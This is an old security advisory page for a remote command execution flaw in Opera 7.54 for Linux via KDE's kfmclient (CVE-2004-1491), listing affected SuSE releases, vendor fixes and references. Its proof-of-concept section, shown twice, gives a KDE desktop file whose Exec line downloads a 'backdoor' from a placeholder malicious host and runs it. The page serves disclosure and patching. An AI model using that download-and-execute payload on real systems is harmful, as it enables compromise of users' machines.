Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
BID:11901
Info
Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
| Bugtraq ID: | 11901 |
| Class: | Design Error |
| CVE: |
CVE-2004-1491 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 13 2004 12:00AM |
| Updated: | Jul 12 2009 08:07AM |
| Credit: | "Giovanni Delvecchio" <[email protected]> disclosed this vulnerability. |
| Vulnerable: |
SuSE Linux 8.1 SuSE Linux 8.0 i386 SuSE Linux 8.0 SuSE Linux 7.3 sparc SuSE Linux 7.3 ppc SuSE Linux 7.3 i386 SuSE Linux 7.3 SuSE Linux 7.2 i386 SuSE Linux 7.2 SuSE Linux 7.1 x86 SuSE Linux 7.1 sparc SuSE Linux 7.1 ppc SuSE Linux 7.1 alpha SuSE Linux 7.1 SuSE Linux 7.0 sparc SuSE Linux 7.0 ppc SuSE Linux 7.0 i386 SuSE Linux 7.0 alpha SuSE Linux 7.0 SuSE Linux 6.4 ppc SuSE Linux 6.4 i386 SuSE Linux 6.4 alpha SuSE Linux 6.4 SuSE Linux 6.3 ppc SuSE Linux 6.3 alpha SuSE Linux 6.3 SuSE Linux 6.2 SuSE Linux 6.1 alpha SuSE Linux 6.1 SuSE Linux 6.0 SuSE Linux 5.3 SuSE Linux 5.2 SuSE Linux 5.1 SuSE Linux 5.0 SuSE Linux 4.4.1 SuSE Linux 4.4 SuSE Linux 4.3 SuSE Linux 4.2 SuSE Linux 4.0 SuSE Linux 3.0 SuSE Linux 2.0 SuSE Linux 1.0 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 Opera Software Opera Web Browser 7.54 Gentoo Linux |
| Not Vulnerable: | |
Discussion
Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content.
Exploitation of this issue allows attacker-supplied commands to be executed in the context of the user running Opera.
Version 7.54 of Opera for Linux with KDE version 3.2.3 is reported vulnerable to this issue. Other versions may also be affected.
It is reported that Opera for Linux is susceptible to a remote command execution vulnerability. This issue is due to a default configuration setting in Opera that utilizes the KDE 'kfmclient' utility to open unknown content.
Exploitation of this issue allows attacker-supplied commands to be executed in the context of the user running Opera.
Version 7.54 of Opera for Linux with KDE version 3.2.3 is reported vulnerable to this issue. Other versions may also be affected.
Exploit / POC
Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
Example file contents have been provided:
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
Example file contents have been provided:
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
Solution / Fix
Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
Solution:
The vendor has released fixes to address this and other issues.
Gentoo has released an advisory (GLSA 200502-17) and an updated eBuild to address this and other issues in the Opera Web Browser. This update can be installed by issuing the following sequence of commands as a superuser:
emerge --sync
emerge --ask --oneshot --verbose ">=net-www/opera-7.54-r3"
SUSE has released an advisory SUSE-SR:2005:008 to address various security issues affecting SUSE products. Please see the referenced advisory for more information.
Opera Software Opera Web Browser 7.54
Solution:
The vendor has released fixes to address this and other issues.
Gentoo has released an advisory (GLSA 200502-17) and an updated eBuild to address this and other issues in the Opera Web Browser. This update can be installed by issuing the following sequence of commands as a superuser:
emerge --sync
emerge --ask --oneshot --verbose ">=net-www/opera-7.54-r3"
SUSE has released an advisory SUSE-SR:2005:008 to address various security issues affecting SUSE products. Please see the referenced advisory for more information.
Opera Software Opera Web Browser 7.54
-
Opera Software Opera 7.54u2
http://www.opera.com/download/ -
SuSE opera-7.54-10.2.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/opera-7.54-10.2.i 586.rpm -
SuSE opera-7.54-10.2.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/opera-7.54-10 .2.x86_64.rpm -
SuSE opera-7.54-17.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/opera-7.54-17.i58 6.rpm -
SuSE opera-7.54-17.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/opera-7.54-17.i58 6.rpm -
SuSE opera-7.54-17.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/opera-7.54-17 .x86_64.rpm -
SuSE opera-7.54-7.5.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/opera-7.54-7.5.i5 86.rpm -
SuSE opera-7.54-7.5.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/opera-7.54-7. 5.x86_64.rpm
References
Opera Web Browser KDE KFMCLIENT Remote Command Execution Vulnerability
References:
References:
- Changelog for Opera 7.54u1 for Linux (Opera Software)
- Changelog for Opera 7.54u2 for Linux (Opera Software)
- [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien ("Giovanni Delvecchio"
)